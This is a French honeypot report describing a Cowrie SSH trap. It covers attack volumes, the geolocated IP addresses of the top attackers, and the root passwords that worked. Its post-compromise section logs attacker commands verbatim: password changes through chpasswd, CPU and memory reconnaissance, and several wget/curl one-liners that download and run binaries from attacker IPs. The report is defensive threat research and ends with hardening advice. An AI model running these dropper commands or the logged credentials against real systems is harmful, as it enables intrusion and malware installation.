Honeypot – exploration des cybermenaces

Voici une petite présentation de notre honeypot: 

C’est un honeypot ssh basé sur cowrie. Il a été mise en service le 1 avril 2020 car nous avons pensé que c’est une des meilleures plaisanteries à faire dans cette période de confinement – la preuve, il est toujours fonctionnel et grâce à lui, nous pouvons apprendre d’avantage au sujet des cybermenaces.


  • Activité générale

Ce tableau représente l'activité globale de notre honeypot, ce qui correspond à son activité générale depuis sa mise en ligne.

Informations générales
Nombre total des cyberattaques1807027
Nombre total des attaquants (IP unique)37144
La premère cyberattaque a débutéeWednesday, 01-Apr-2020, 15:29 (GTM +1)
La dernière cyberattaque a débutéeSaturday, 23-Jan-2021, 05:22 (GTM +1)

Le tableau ci-dessous, représente une activité journalière de notre honeypot.

Informations journalières
Heure locale du honeypotSaturday, 23-01-21, 05:23 (GTM +1)
Nombre des cyberattaques d'aujourd'hui 2666
Attaquant récent51.79.164.102
Provenance géographique du dernier attaquantCanada (CA)

Voici la représentation graphique de l'activité quotidienne de notre honeypot. Les points indiquent le nombre des cyberattaques par jour.


Le graphique ci-dessous représente les vingt jours de plus grand nombre des cyberattaques enregistrées par notre honeypot.


Nous pouvons visualiser aussi la représentation graphique des dix combinaisons des noms d'utilisateurs et des mots de passe, le plus souvent utilisées par les attaquants. C'est le gaphique ci-dessous.


  • Géolocalisation des attaquants

Nous allons choisir les dix plus grands attaquants dans la base des données de notre honeypot et procéder à leurs géolocalisation. Nous allons entrer ces données dans le tableau ci-dessous:

Informations au sujet de la géolocalisation et classement des dix attaquats le plus actifs
Adresse IPAttaquesVilleRégionPaysCodeLatitudeLongitudenom d'hôte
1
112.85.42.23244496XinpuJiangsuChinaCN34.5997119.1594112.85.42.232
2
112.85.42.23834909XinpuJiangsuChinaCN34.5997119.1594112.85.42.238
3
49.88.112.11032701ShanghaiShanghaiChinaCN31.0449121.401249.88.112.110
4
112.85.42.22927705XinpuJiangsuChinaCN34.5997119.1594112.85.42.229
5
142.93.8.14711136North BergenNew JerseyUnited StatesUS40.793-74.0247142.93.8.147
6
89.163.148.9310525SimmernRheinland-PfalzGermanyDE49.9827.5235ju093.jupiter.servdiscount-customer.com
7
45.227.255.20410417PanamaPA9-80hosting-by.web4net.org
8
121.178.197.10910219Yeongam-gunJeollanam-doSouth KoreaKR34.7979126.6265121.178.197.109
9
191.239.251.2468807CampinasSao PauloBrazilBR-22.9056-47.0608191.239.251.246
10
69.158.207.1418247CanadaCA43.6319-79.3716fff.tdlab.ca

Afin de visualiser le volume des cyberattaques de chaqun d'entre eux, nous allons ajouter les codes des pays (à deux lettres) après leurs adresses IP. Nous obtiendrons ainsi leurs provenance géographique.
Sur le graphique ci-dessous, nous pouvons voir le volume des cyberattaques ainsi que les données de la géolocalisation des attaquant les plus actifs.


Ceci nous premet d'afficher les données du volume des cyberattaques en fonction des pays de leurs origines. Ci-dessous nous avons alors la représentation graphique du volume global des cyberattaques en fonction la géolocalisation des attaquants les plus actifs.


  • Les intrusions

Certains attaquants ont réussi à trouver les bonnes combinaisons login/mot de passe, ce qui nous a permis d'observer leurs attaques. Voici la présentation des certaines données recueillies:

Voici la représentation graphique du ratio des cyberattaques "réussies". Pour cela, regardons le graphique présent ci-dessous.

Ci-dessous, nous trouvons le graphique affichant les intrusions hébdomadaires enregistrées par notre honeypot. Les points de la courbe indiquent le nombre total d'intrusions dans la même jornée.


Le graphique ci-dessous affiche les vingt jours ayant le plus grand nombres d'intrusions. Les chiffres indiquent combien de fois des informations d'identification correctes (login et mot de passe) ont été saisies par les attaquants.


Le graphe ci-dessous affiche le nombre d'intrusions réussies à partir de la même adresse IP. Les nombres indiquent combien de fois le même attaquant avait réussi d'ouvrir la session en saisissant le login et mot de passe correctement.


Nous allons procéder à la géolocalisation des adresses IP des dix attaquants, qui ont le taux de réussite le plus important.

Informations au sujet des ressources et de la géolocalisation des dix attaquants ayant le plus grand nombe d'intrusions
Vu pour la dernière foisAdresse IPPaysTotal IntrusionsDernier Login utiliséDernier Mot de passe utilisé
1
Thursday, 08-Oct-2020, 19:04 (GTM +1)112.85.42.232China
242
root1qaz@WSX3edc$RFV
2
Friday, 22-Jan-2021, 21:08 (GTM +1)49.88.112.110China
110
root1qaz2wsx123
3
Friday, 22-Jan-2021, 21:13 (GTM +1)154.223.167.54Hong Kong
61
root1qaz2wsx123
4
Sunday, 20-Sep-2020, 06:47 (GTM +1)112.85.42.229China
51
root1qaz2wsx123
5
Thursday, 24-Sep-2020, 07:57 (GTM +1)112.85.42.238China
20
root1qaz2wsx123
6
Monday, 10-Aug-2020, 14:46 (GTM +1)98.159.99.227United States
18
root1qaz@WSX3edc$RFV
7
Tuesday, 01-Sep-2020, 14:20 (GTM +1)98.159.99.25United States
17
root1qaz2wsx123
8
Thursday, 17-Sep-2020, 20:25 (GTM +1)98.159.110.232United States
14
root1qaz@WSX3edc$RFV
9
Sunday, 21-Jun-2020, 19:56 (GTM +1)98.159.99.49United States
13
root1qaz@WSX3edc$RFV
10
Tuesday, 01-Sep-2020, 09:38 (GTM +1)98.159.99.50United States
12
root1qaz@WSX3edc$RFV

Dans ce tableau, nous pouvons voir aussi les derniers mots de passe utilisés par les attaquants qui leurs ont permis d'accéder au système. Remarquez que se sont les mots de passe "standard" utilisés par beaucoup de professionels de l'infogérance (je ne vais pas citer les noms ici...).

Pour admirer les dix "combinaisons gagnantes", regardons le graphique ci-dessous.


Par cette petite experience, nous avons démontré que l'authentification par login et mot de passe n'est pas une méthode de protection suffisante. Afin de mieux protéger notre système contre ces cyberattaques, la méthode des clefs et/ou deuxième facteur d'authentification sera le meilleur choix. Il est également risqué d'autoriser le login "root" dans la configuration du serveur ssh.

  • Activité post-compromise

Certains attaquants vont essayer de détourner "notre serveur" afin de s’en servir de relais pour mener des actions cybercriminelles et malveillantes, ou tout simplement, utiliser nos ressources pour miner la crypto-monnaie. Ces attaques sont de plus en plus fréquentes et ça arrive plus souvent qu'on y croit. Ce ne sont pas que de grandes entreprises qui sont visées. Nous allons voir ce que les attaquants espèrent d'obtenir en s'attaquant à notre "serveur". La plupart d'attaques est faite par les bots. Le problème de ces attaques est la saturation de la bande passante du serveur. Cependant ici, nous allons visualiser les véritables intrusions et tentatives de détournement du système. Contrairement aux idées reçues à ce sujet, ça arrive beaucoup plus souvent qu'on y pense.

Le graphique du dessous montre une "activité humaine" journalière. Il prends en compte le nombre d'intrusions dans le système pour chaque jour de fonctionnement du honeypot. Ici il s'agit des véritables tentatives de prise de contrôle de notre "serveur".


Le tableau ci-dessous montre les dix commandes "passwd et chpasswd" utilisées par les attaquants affin de modifier le mot de passe et prendre le contrôle totale de notre serveur.

IDDateLes dix dernières commandes "passwd & chpasswd"
1
Saturday, 23-Jan-2021, 04:40echo "1qaz2wsx\nLxULsFMLeRq9\nLxULsFMLeRq9\n"|passwd
2
Saturday, 23-Jan-2021, 04:40echo -e "1qaz2wsx\nLxULsFMLeRq9\nLxULsFMLeRq9"|passwd|bash
3
Saturday, 23-Jan-2021, 04:05echo "root:owaz1L8SYwCN"|chpasswd|bash
4
Saturday, 23-Jan-2021, 02:21echo "1qaz2wsx\nPUrbHaZY7cXo\nPUrbHaZY7cXo\n"|passwd
5
Saturday, 23-Jan-2021, 02:21echo -e "1qaz2wsx\nPUrbHaZY7cXo\nPUrbHaZY7cXo"|passwd|bash
6
Friday, 22-Jan-2021, 21:32echo "root:efvZqpgzv74x"|chpasswd|bash
7
Friday, 22-Jan-2021, 21:18echo "root:qDvNOTtWCEyb"|chpasswd|bash
8
Monday, 08-Jun-2020, 13:29echo "root:iAcRv9ho2vai"|chpasswd|bash
9
Sunday, 07-Jun-2020, 18:04echo "root:rU73KDvqwbJq"|chpasswd|bash
10
Friday, 05-Jun-2020, 04:37echo "root:lOvkrC6fkjyQ"|chpasswd|bash

Le tableau suivant affiche les dix commandes le plus fréquemment utilisées par les attaquants. Cela sert à effectuer un repèrage simplifié. Remarquez que beaucoup de commandes, ce sont celles qui indiquent le type du processeur utilisé et la quantité de mémoire installée, ce qui est très utile pour installer un crypto-miner (monnaie viruelle).

Les dix commandes fréquemment utilisées (général)Nombre d'entrées
1
/bin/eyshcjdmzg
162
2
ls -la /var/run/gcc.pid
81
3
/usr/bin/tar Pxvf -
74
4
cat /proc/cpuinfo | grep name | wc -l
24
5
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
24
6
cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}
24
7
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
24
8
free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}
24
9
ls -lh $(which ls)
24
10
which ls
24

Le tableau du dessous affiche dix dernières commandes wget. Il s'agit bien des malwares que les attaquants tentent de nous faire télécharger afin de les installer dans notre système. Ces malwares pouraient être des backdoors, comme aussi des crypto-miners.

DateLes dix dernières commandes "wget"
122-Jan-2021#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/23; curl -O http://98.159.105.55/23; chmod +x 23; ./23;
211-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/8000; curl -O http://98.159.99.47/8000; chmod +x 8000; ./8000;
311-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/53; curl -O http://98.159.99.39/53; chmod +x 53; ./53;
410-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/53; curl -O http://98.159.99.47/53; chmod +x 53; ./53;
510-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306;
610-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306;
709-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3309; curl -O http://98.159.99.39/3309; chmod +x 3309; ./3309;
808-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.12/3309; curl -O http://98.159.99.12/3309; chmod +x 3309; ./3309;
908-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3308; curl -O http://98.159.99.39/3308; chmod +x 3308; ./3308;
1007-Jun-2020#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.12/3308; curl -O http://98.159.99.12/3308; chmod +x 3308; ./3308;

Voilà, notre petite "visite guidée" touche à sa fin. Soyez prudents et ne négligez pas les risques cyber. La cybermenace est bien réelle et les attaquants ne seront jamais gentils avec vous.



Géolocalisation: www.maxmind.com

Laisser un commentaire